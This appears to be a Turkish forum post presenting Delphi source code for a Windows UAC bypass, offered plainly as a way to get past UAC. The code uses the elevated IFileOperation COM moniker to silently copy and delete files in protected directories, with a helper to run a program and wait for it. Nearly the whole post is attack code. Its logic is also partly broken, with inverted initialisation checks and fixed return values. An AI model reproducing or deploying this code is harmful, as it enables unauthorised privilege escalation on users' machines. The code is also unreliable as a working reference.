Windows UAC Bypass Kodları

Bu kodlarla uac duvarını aşabilirsiniz. 

Kod:
type

 PBindOpts3 = ^TBindOpts3;
{$EXTERNALSYM tagBIND_OPTS3}
  tagBIND_OPTS3 = record
    cbStruct: DWORD;
    grfFlags: DWORD;
    grfMode: DWORD;
    dwTickCountDeadline: DWORD;
    dwTrackFlags: DWORD;
    dwClassContext: DWORD;
    locale: LCID;
    pServerInfo: Pointer;
    hwnd: hwnd;
  end;
  TBindOpts3 = tagBIND_OPTS3;
{$EXTERNALSYM BIND_OPTS3}
  BIND_OPTS3 = TBindOpts3;


var

    pFileOp            : IFileOperation;
  pSHISource        : IShellItem;
  pSHIDestination   : IShellItem;
  pSHIDelete        : IShellItem;
  szEIFOMoniker     :widestring;
  pIID_EIFO         : TGUID;
  pIID_ShellItem    : TGUID;
  pIID_ShellItem2   : TGUID;
  bo                 : TBindOpts3;
 


**************************************************

function deletefil (szElevDllFull:string):hresult;
begin
if (CoInitialize (NIL)            <> S_OK)  then

 bo.cbStruct             := SizeOf(BIND_OPTS3);
 bo.dwClassContext       := CLSCTX_LOCAL_SERVER;

 szEIFOMoniker              := ('Elevation:Administrator!new:{3ad05575-8857-4850-9277-

11b85bdb8e09}');
pIID_EIFO                        := iFileOperation;
pIID_ShellItem2                  := iShellItem2;

if (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) and
     (pFileOp <> NIL) and
     (pFileOp.SetOperationFlags (FOF_NOCONFIRMATION or FOF_SILENT or FOFX_SHOWELEVATIONPROMPT or 

FOFX_NOCOPYHOOKS or FOFX_REQUIREELEVATION or FOF_NOERRORUI) = S_OK) and
(SHCreateItemFromParsingName(pwidechar(szElevDllFull), Nil, IID_iShellItem,pSHIDelete)=S_OK) THEN

    if ( pFileOp.DeleteItem(pSHIDelete, NIL)= S_OK) THEN
     if (pFileOp.PerformOperations = S_OK)  then
     begin
 
     end;
  CoUninitialize;
  result:=0;
   end;
********************************************************
   function copyfil (szSourceDll,szElevDir:string):hresult;
begin
if (CoInitialize (NIL)            <> S_OK)  then

 bo.cbStruct             := SizeOf(BIND_OPTS3);
 bo.dwClassContext       := CLSCTX_LOCAL_SERVER;

 szEIFOMoniker              := ('Elevation:Administrator!new:{3ad05575-8857-4850-9277-

11b85bdb8e09}');
pIID_EIFO                        := iFileOperation;
pIID_ShellItem                  := iShellItem;

if (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) and
     (pFileOp <> NIL) and
     (pFileOp.SetOperationFlags (FOF_NOCONFIRMATION or FOF_SILENT or FOFX_SHOWELEVATIONPROMPT or 

FOFX_NOCOPYHOOKS or FOFX_REQUIREELEVATION or FOF_NOERRORUI) = S_OK) and

 (SHCreateItemFromParsingName(pwidechar(szSourceDll), NIL, pIID_ShellItem, pSHISource) = S_OK) and

(pSHISource <> NIL) and
     (SHCreateItemFromParsingName(pwidechar(szElevDir), NIL, pIID_ShellItem, pSHIDestination) = S_OK) 

and
     (pSHIDestination <> NIL) and
     (pFileOp.CopyItem(pSHISource, pSHIDestination, nil, NIL) = S_OK) and
     (pFileOp.PerformOperations = S_OK)  then
     begin
    
     end;
  CoUninitialize;
  result:=0;
   end;

**********************************************************************************    
 function ExecAndWait(Filename,dir: String): boolean;
var
 
  Shinfo: SHELLEXECUTEINFO;
  ExitCode:DWORD;
begin

    FillChar(ShInfo, SizeOf(ShInfo), 0);
   
    Shinfo.cbSize := sizeof(SHELLEXECUTEINFO);
    Shinfo.fMask := SEE_MASK_NOCLOSEPROCESS; //SEE_MASK_CONSOL
   
    Shinfo.lpFile := PChar(Filename);
    Shinfo.lpParameters := nil;//PAnsiChar(AnsiString(Params));
    Shinfo.lpDirectory := pchar(dir);//PChar(ExtractFileDir(Filename));
    Shinfo.nShow :=sw_show;
    ShellExecuteEx(@Shinfo);
    try
    
 repeat
    ExitCode  := WaitForSingleObject(SHInfo.hProcess,INFINITE);

   until (ExitCode <> WAIT_TIMEOUT);

      result:=true;
 finally


    end;
  end;